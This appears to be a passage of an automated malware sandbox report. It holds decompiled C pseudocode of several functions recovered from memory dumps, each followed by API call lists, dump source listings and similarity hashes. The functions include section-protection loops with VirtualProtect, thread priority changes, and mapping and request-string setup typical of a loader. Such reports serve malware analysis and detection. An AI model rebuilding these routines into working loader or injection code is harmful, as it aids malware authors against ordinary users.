                                                                                                                                                                                                                                                                                    				if(_v8 >= _t39) {
                                                                                                                                                                                                                                                                                    					_t28 = _v12;
                                                                                                                                                                                                                                                                                    					if(_t28 != 0) {
                                                                                                                                                                                                                                                                                    						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                                                                                                                                                                                                                    						_v8 = _t31;
                                                                                                                                                                                                                                                                                    						if(_t31 >= 0) {
                                                                                                                                                                                                                                                                                    							_t46 = lstrlenW(_v16);
                                                                                                                                                                                                                                                                                    							if(_t46 != 0) {
                                                                                                                                                                                                                                                                                    								_t46 = _t46 + 1;
                                                                                                                                                                                                                                                                                    								_t48 = _t46 + _t46;
                                                                                                                                                                                                                                                                                    								_t39 = E00FC5C4E(_t48);
                                                                                                                                                                                                                                                                                    								if(_t39 == 0) {
                                                                                                                                                                                                                                                                                    									_v8 = 0x8007000e;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									memcpy(_t39, _v16, _t48);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								__imp__#6(_v16);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t32 = _v12;
                                                                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					 *_a4 = _t39;
                                                                                                                                                                                                                                                                                    					 *_a8 = _t46 + _t46;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L13;
                                                                                                                                                                                                                                                                                    			}















APIs
• Sleep.KERNEL32(000000C8), ref: 00FC59B6
• lstrlenW.KERNEL32(?), ref: 00FC59EC
• memcpy.NTDLL(00000000,?,00000000,00000000), ref: 00FC5A0D
• SysFreeString.OLEAUT32(?), ref: 00FC5A21

Memory Dump Source
• Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
• Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp

Similarity
• API ID: FreeSleepStringlstrlenmemcpy
• String ID:
• API String ID: 1198164300-0
• Opcode ID: e7f7972d3c7375a127291b0860e2a6827d03bebfd28a60b65bf206032a535e69
• Instruction ID: 499d0f9fbf8e37f196b5cd62a94a213777881e61f3d79dfb5819741a5ff2492a
• Opcode Fuzzy Hash: e7f7972d3c7375a127291b0860e2a6827d03bebfd28a60b65bf206032a535e69
• Instruction Fuzzy Hash: 1221327590060AEFCB10DFA5CA89E9EBBB8FF48714B10416DE945E7210E774EA41EF50

Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                                                                    			E6E051D32(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                    				long _t3;
                                                                                                                                                                                                                                                                                    				int _t4;
                                                                                                                                                                                                                                                                                    				int _t9;
                                                                                                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t13 = GetCurrentThread();
                                                                                                                                                                                                                                                                                    				_t3 = SetThreadAffinityMask(_t13, 1); // executed
                                                                                                                                                                                                                                                                                    				if(_t3 != 0) {
                                                                                                                                                                                                                                                                                    					SetThreadPriority(_t13, 0xffffffff); // executed
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t4 = E6E0517A7(_a4); // executed
                                                                                                                                                                                                                                                                                    				_t9 = _t4;
                                                                                                                                                                                                                                                                                    				if(_t9 == 0) {
                                                                                                                                                                                                                                                                                    					SetThreadPriority(_t13, _t4);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                                                                    				return _t9;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6E051D35
                                                                                                                                                                                                                                                                                    • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E051D40
                                                                                                                                                                                                                                                                                    • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E051D53
                                                                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E051D66
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
• Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Thread$Priority$AffinityCurrentMask
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1452675757-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e70e205ff66fa734b616a8f52886c601f2175cef0a42269e0416338c7111e960
                                                                                                                                                                                                                                                                                    • Instruction ID: 8ed72daee4dbcfbcbb80ce2e7c39b85b34c1c88262de071aa2489042e8aa3d9e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e70e205ff66fa734b616a8f52886c601f2175cef0a42269e0416338c7111e960
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09E09231315B112B97022AAD4D9CFAB7B9DDF973717020335F524D22D4DB588C2A89B5
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00FC4A3C(void* __edx) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                                                                                                    				WCHAR* _v16;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                                                                    				intOrPtr _t24;
                                                                                                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                                                                                                                                                    				intOrPtr _t35;
                                                                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t50 = __edx;
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_t23 = E00FC4380(0,  &_v8); // executed
                                                                                                                                                                                                                                                                                    				if(_t23 != 0) {
                                                                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t24 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    				_t4 = _t24 + 0xfcbd90; // 0x38f9338
                                                                                                                                                                                                                                                                                    				_t5 = _t24 + 0xfcbd38; // 0x4f0053
                                                                                                                                                                                                                                                                                    				_t26 = E00FC30AD( &_v16, _v8, _t5, _t4); // executed
                                                                                                                                                                                                                                                                                    				_t45 = _t26;
                                                                                                                                                                                                                                                                                    				if(_t45 == 0) {
                                                                                                                                                                                                                                                                                    					StrToIntExW(_v16, 0,  &_v12);
                                                                                                                                                                                                                                                                                    					_t45 = 8;
                                                                                                                                                                                                                                                                                    					if(_v12 < _t45) {
                                                                                                                                                                                                                                                                                    						_t45 = 1;
                                                                                                                                                                                                                                                                                    						__eflags = 1;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t32 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    						_t11 = _t32 + 0xfcbd84; // 0x38f932c
                                                                                                                                                                                                                                                                                    						_t48 = _t11;
                                                                                                                                                                                                                                                                                    						_t12 = _t32 + 0xfcbd38; // 0x4f0053
                                                                                                                                                                                                                                                                                    						_t55 = E00FC4DC8(_t11, _t12, _t11);
                                                                                                                                                                                                                                                                                    						_t59 = _t55;
                                                                                                                                                                                                                                                                                    						if(_t55 != 0) {
                                                                                                                                                                                                                                                                                    							_t35 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    							_t13 = _t35 + 0xfcbdce; // 0x30314549
                                                                                                                                                                                                                                                                                    							if(E00FC5EC8(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
                                                                                                                                                                                                                                                                                    								_t61 =  *0xfca2b4 - 6;
                                                                                                                                                                                                                                                                                    								if( *0xfca2b4 <= 6) {
                                                                                                                                                                                                                                                                                    									_t42 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    									_t15 = _t42 + 0xfcbbda; // 0x52384549
                                                                                                                                                                                                                                                                                    									E00FC5EC8(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_t38 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    							_t17 = _t38 + 0xfcbdc8; // 0x38f9370
                                                                                                                                                                                                                                                                                    							_t18 = _t38 + 0xfcbda0; // 0x680043
                                                                                                                                                                                                                                                                                    							_t45 = E00FC33B7(_v8, 0x80000001, _t55, _t18, _t17);
                                                                                                                                                                                                                                                                                    							HeapFree( *0xfca290, 0, _t55);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					HeapFree( *0xfca290, 0, _v16);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t54 = _v8;
                                                                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    					E00FC3EFA(_t54);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t45;
                                                                                                                                                                                                                                                                                    			}


















APIs
• StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,038F9338,00000000,?,73BCF710,00000000,73BCF730), ref: 00FC4A8B
• HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,038F9370,?,00000000,30314549,00000014,004F0053,038F932C), ref: 00FC4B28
• HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00FC1BD5), ref: 00FC4B3A

Memory Dump Source
• Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
• Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp

Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: b6cb33db43e5232285b1a6e96780e5d75a92c2881c69b688bcf28b35109bfacc
• Instruction ID: 4eaaf7177b7f8363ad5021a259680a6c146b10c01f92307a39a2625b354d15b0
• Opcode Fuzzy Hash: b6cb33db43e5232285b1a6e96780e5d75a92c2881c69b688bcf28b35109bfacc
• Instruction Fuzzy Hash: 38318C3290011EBEDB119BA4DE87FAABBB8EF85714F190099F505A7021D771BE04FB60

Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                                                                                                                                                                    			E00FC243C(intOrPtr* __eax, void* __ecx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                                                    				intOrPtr _t22;
                                                                                                                                                                                                                                                                                    				long _t29;
                                                                                                                                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t41;
                                                                                                                                                                                                                                                                                    				void* _t42;
                                                                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t47;
                                                                                                                                                                                                                                                                                    				void* _t48;
                                                                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t42 = __ecx;
                                                                                                                                                                                                                                                                                    				_t41 = _a16;
                                                                                                                                                                                                                                                                                    				_t47 = __eax;
                                                                                                                                                                                                                                                                                    				_t22 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    				_t2 = _t22 + 0xfcb671; // 0x657a6973
                                                                                                                                                                                                                                                                                    				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
                                                                                                                                                                                                                                                                                    				if( *0xfca2a4 >= 5) {
                                                                                                                                                                                                                                                                                    					_push( &_a16);
                                                                                                                                                                                                                                                                                    					_push( &_v8);
                                                                                                                                                                                                                                                                                    					_push( &_v48);
                                                                                                                                                                                                                                                                                    					_t29 = _a4;
                                                                                                                                                                                                                                                                                    					"QQSUVWh"();
                                                                                                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                                                                                                    					_a4 = _t29;
                                                                                                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                                                                                                    					if(_a4 != 0) {
                                                                                                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                                                                                                    						 *0xfca2a4 =  *0xfca2a4 + 1;
                                                                                                                                                                                                                                                                                    						L10:
                                                                                                                                                                                                                                                                                    						return _a4;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t49 = _a16;
                                                                                                                                                                                                                                                                                    					 *_t47 = _a16;
                                                                                                                                                                                                                                                                                    					_t48 = _v8;
                                                                                                                                                                                                                                                                                    					 *_t41 = E00FC3F12(_t49, _t48);
                                                                                                                                                                                                                                                                                    					_t33 = E00FC45E6(_t46, _t48, _t49);
                                                                                                                                                                                                                                                                                    					if(_t33 != 0) {
                                                                                                                                                                                                                                                                                    						 *_a8 = _t48;
                                                                                                                                                                                                                                                                                    						 *_a12 = _t33;
                                                                                                                                                                                                                                                                                    						if( *0xfca2a4 < 5) {
                                                                                                                                                                                                                                                                                    							 *0xfca2a4 =  *0xfca2a4 & 0x00000000;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_a4 = 0xbf;
                                                                                                                                                                                                                                                                                    					E00FC2813();
                                                                                                                                                                                                                                                                                    					HeapFree( *0xfca290, 0, _t48);
                                                                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t50 =  *0xfca390; // 0x38f8d6c
                                                                                                                                                                                                                                                                                    				if(RtlAllocateHeap( *0xfca290, 0, 0x800) == 0) {
                                                                                                                                                                                                                                                                                    					_a4 = 8;
                                                                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t29 = E00FC6DB7(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // executed
                                                                                                                                                                                                                                                                                    				goto L5;
                                                                                                                                                                                                                                                                                    			}
















                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00FC245E
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00FC2483
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC6DB7: GetTickCount.KERNEL32 ref: 00FC6DCE
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC6DB7: wsprintfA.USER32 ref: 00FC6E1B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC6DB7: wsprintfA.USER32 ref: 00FC6E38
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC6DB7: wsprintfA.USER32 ref: 00FC6E58
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC6DB7: wsprintfA.USER32 ref: 00FC6E76
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC6DB7: wsprintfA.USER32 ref: 00FC6E99
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC6DB7: wsprintfA.USER32 ref: 00FC6EBA
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00FC1C1F,?,?,00FC1C1F,?), ref: 00FC24FD
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: wsprintf$Heap$AllocateCountFreeTick
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2794511967-0
                                                                                                                                                                                                                                                                                    • Opcode ID: baf4c00b31572b8102f95c34e703369d425d0a633f3094bb173b065302adb679
                                                                                                                                                                                                                                                                                    • Instruction ID: 9948f50128aec9bc015f319f865d2669eff717bb878a3c3df2744cd170289752
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: baf4c00b31572b8102f95c34e703369d425d0a633f3094bb173b065302adb679
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4131387250011EEFCB01DF64DE86FDA3BB8FB48314F14402AF905A7251D775A904EBA1
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                                                                                                    			E6E051030(void* __eax, void* _a4) {
                                                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                                                                    				int _t43;
                                                                                                                                                                                                                                                                                    				long _t54;
                                                                                                                                                                                                                                                                                    				signed int _t57;
                                                                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                                                                    				signed int _t60;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                                                                    				_t57 =  *0x6e0541cc;
                                                                                                                                                                                                                                                                                    				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                                                                                                                                                                                                                                                    				_v16 =  *(__eax + 6) & 0x0000ffff;
                                                                                                                                                                                                                                                                                    				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
                                                                                                                                                                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                                                                                    				if(_v16 <= 0) {
                                                                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                                                                    					return _v12;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					goto L1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                                                                                    					_t60 = _v12;
                                                                                                                                                                                                                                                                                    					if(_t60 != 0) {
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                                                                    					if(_t60 >= 0) {
                                                                                                                                                                                                                                                                                    						asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                                                                    						if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                    							L8:
                                                                                                                                                                                                                                                                                    							_t54 = _t57 - 0x63699bbf;
                                                                                                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                                                                                                    							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                                                                                                                                                                                                                                                                    							if(_t43 == 0) {
                                                                                                                                                                                                                                                                                    								_v12 = GetLastError();
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                    							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
                                                                                                                                                                                                                                                                                    							if(_v8 < _v16) {
                                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								goto L12;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                                                                    						_t54 = _t57 - 0x63699bc1;
                                                                                                                                                                                                                                                                                    						if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                    							goto L9;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					asm("bt [esi+0x24], eax");
                                                                                                                                                                                                                                                                                    					if(_t60 >= 0) {
                                                                                                                                                                                                                                                                                    						_t54 = _t57 - 0x63699ba3;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t54 = _t57 - 0x63699b83;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6E051069
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E0510DE
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E0510E4
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
• Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual$ErrorLast
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1469625949-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 83c3d807fe629c1c15d1bfb45eb02c0423856c4f73e3ef7bbce32ae00f3e88f4
                                                                                                                                                                                                                                                                                    • Instruction ID: 5b767498cca2c9a758986dbc7570da5707bcf5d542afa3c0b51a439388255033
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83c3d807fe629c1c15d1bfb45eb02c0423856c4f73e3ef7bbce32ae00f3e88f4
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E217131800706EFCB14CFD5C985AAAF7F5FF08359F008959D00697645E3B8AAA9CF91
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                                                                                                                                                    			E6E0516EC() {
                                                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                                                    				void _v44;
                                                                                                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                                                                                                    				void* _v52;
                                                                                                                                                                                                                                                                                    				long _t23;
                                                                                                                                                                                                                                                                                    				int _t24;
                                                                                                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t30;
                                                                                                                                                                                                                                                                                    				signed int _t34;
                                                                                                                                                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                                                                    				_push(0x6e0541c4);
                                                                                                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                                                                                                    				_push( *0x6e0541d0 + 0x6e055089);
                                                                                                                                                                                                                                                                                    				 *0x6e0541c0 = 0xc;
                                                                                                                                                                                                                                                                                    				 *0x6e0541c8 = 0; // executed
                                                                                                                                                                                                                                                                                    				L6E0514D8(); // executed
                                                                                                                                                                                                                                                                                    				_t34 = 6;
                                                                                                                                                                                                                                                                                    				memset( &_v44, 0, _t34 << 2);
                                                                                                                                                                                                                                                                                    				if(E6E051112( &_v44,  &_v28,  *0x6e0541cc ^ 0xfd7cd1cf) == 0) {
                                                                                                                                                                                                                                                                                    					_t23 = 0xb;
                                                                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                                                                    					ExitThread(_t23);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t24 = lstrlenW( *0x6e0541b8);
                                                                                                                                                                                                                                                                                    				_t7 = _t24 + 2; // 0x2
                                                                                                                                                                                                                                                                                    				_t10 = _t24 + _t7 + 8; // 0xa
                                                                                                                                                                                                                                                                                    				_t28 = E6E051979(_t36, _t10,  &_v48,  &_v52); // executed
                                                                                                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                                                                                                    					_t30 = _v52;
                                                                                                                                                                                                                                                                                    					 *_t30 = 0;
                                                                                                                                                                                                                                                                                    					if( *0x6e0541b8 == 0) {
                                                                                                                                                                                                                                                                                    						 *((short*)(_t30 + 4)) = 0;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						E6E052112(_t40, _t30 + 4);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t23 = E6E051236(_v44); // executed
                                                                                                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6E0541C4,00000000), ref: 6E05171D
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?), ref: 6E051751
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051979: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?,?), ref: 6E051986
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051979: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E05199C
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051979: _snwprintf.NTDLL ref: 6E0519C1
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051979: CreateFileMappingW.KERNELBASE(000000FF,6E0541C0,00000004,00000000,?,?), ref: 6E0519E6
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051979: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A,?), ref: 6E0519FD
                                                                                                                                                                                                                                                                                      • Part of subcall function 6E051979: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E05176E,0000000A), ref: 6E051A32
                                                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 6E0517A0
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4209869662-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3b28d90efe12d0de8af38b6498b5b62f89aa5b17bc2361e85a2ac3a7e2322795
